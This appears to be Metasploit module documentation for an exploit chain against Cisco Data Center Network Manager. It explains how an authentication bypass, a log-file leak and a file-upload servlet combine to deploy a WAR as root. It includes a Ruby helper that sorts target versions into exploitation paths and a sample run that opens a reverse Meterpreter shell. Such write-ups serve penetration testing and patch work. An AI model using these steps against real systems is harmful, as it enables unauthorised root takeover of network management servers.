2020-01-20 21:26:59 -05:00
## Vulnerable Application
Cisco Data Center Network Manager (DCNM) exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
An authenticated user can abuse this servlet to write a WAR into the application server's deployment
directory (the Apache Tomcat webapps directory; on 11.1(1) the module reports the WildFly `sandeployments`
path shown in the sample run below) and achieve remote code execution as root, since the DCNM application
server runs as root.

In addition to the file upload itself, this module chains two other vulnerabilities: CVE-2019-1619, an
authentication bypass that works on versions 10.4(2) and below, and CVE-2019-1622, an information
disclosure that leaks the log file from which the correct deployment directory for the WAR upload is read.

The module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
(see References to understand why); on the other tested versions no credentials are needed.
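The version-dependent branching described above, written out as an added Ruby example that is not the Metasploit module's own code. It parses Cisco's `major.minor(patch)` version strings and returns which path to the upload servlet the page's facts support for that release; versions the page does not cover come back as `:unknown` rather than being assumed exploitable. The function name, the returned hash keys and the option names `username`/`password` are assumptions for illustration.

```ruby
# Added example: decide how the /fm/fileUpload servlet can be reached on a
# given DCNM release, using only the version facts stated on this page.
# Not part of the Metasploit module; names are illustrative.

DcnmVersion = Struct.new(:major, :minor, :patch) do
  include Comparable

  # Cisco writes DCNM releases as "10.4(2)"; reject anything else so a
  # mis-detected banner cannot silently fall into the wrong branch.
  def self.parse(str)
    m = str.to_s.strip.match(/\A(\d+)\.(\d+)\((\d+)\)\z/)
    raise ArgumentError, "unrecognised DCNM version: #{str.inspect}" unless m
    new(*m.captures.map(&:to_i))
  end

  def <=>(other)
    to_a <=> other.to_a
  end

  def to_s
    "#{major}.#{minor}(#{patch})"
  end
end

AUTH_BYPASS_MAX = DcnmVersion.parse('10.4(2)')   # CVE-2019-1619 bypass works up to here
CREDS_REQUIRED  = DcnmVersion.parse('11.0(1)')   # the one tested release that needs a login
NO_AUTH_TESTED  = DcnmVersion.parse('11.1(1)')   # upload reachable with no login at all
TESTED = [AUTH_BYPASS_MAX, CREDS_REQUIRED, NO_AUTH_TESTED].freeze

# Returns a hash with:
#   :path   -> :auth_bypass (CVE-2019-1619), :credentials, :no_auth or :unknown
#   :tested -> whether this exact release is one the page says was tested
#   :ready  -> true when everything needed for that path has been supplied
def exploitation_path(version_str, username: nil, password: nil)
  v = DcnmVersion.parse(version_str)
  path =
    if v <= AUTH_BYPASS_MAX   then :auth_bypass   # includes "a few versions below 10.4(2)"
    elsif v == CREDS_REQUIRED then :credentials
    elsif v == NO_AUTH_TESTED then :no_auth
    else                           :unknown        # page makes no claim; do not assume
    end
  ready =
    case path
    when :credentials then !!(username && password)
    when :unknown     then false
    else true
    end
  { version: v.to_s, path: path, tested: TESTED.include?(v), ready: ready }
end

if $PROGRAM_NAME == __FILE__
  %w[10.3(1) 10.4(2) 11.0(1) 11.1(1) 11.2(1)].each do |ver|
    r = exploitation_path(ver)
    puts format('%-8s path=%-12s tested=%-5s ready=%s', r[:version], r[:path], r[:tested], r[:ready])
  end
end
```

Note that `:unknown` is deliberately not treated as exploitable: a detection routine that falls through to "no auth required" for every release it has never seen would fire the upload blindly at hosts the module has no basis to attack.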
## Scenarios
Set RHOST, LHOST and LPORT, run the module and wait for the session. Only 11.0(1) needs DCNM credentials
(see above); the other tested versions need nothing beyond the target address.

```
[*] Started reverse TCP handler on 10.75.1.1:4444
[+] 10.75.1.40:443 - Detected DCNM 11.1(1)
[*] 10.75.1.40:443 - No authentication required, ready to exploit!
[+] 10.75.1.40:443 - Obtain WAR path from logs: /usr/local/cisco/dcm/wildfly-10.1.0.Final/standalone/sandeployments
[*] 10.75.1.40:443 - Uploading payload...
[+] 10.75.1.40:443 - WAR uploaded, waiting a few seconds for deployment...
[*] 10.75.1.40:443 - Executing payload...
[*] Sending stage (53867 bytes) to 10.75.1.40
[*] Meterpreter session 1 opened (10.75.1.1:4444 -> 10.75.1.40:60592) at 2019-08-29 12:41:49 +0700

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.75.1.40 - Meterpreter session 1 closed.  Reason: User exit
```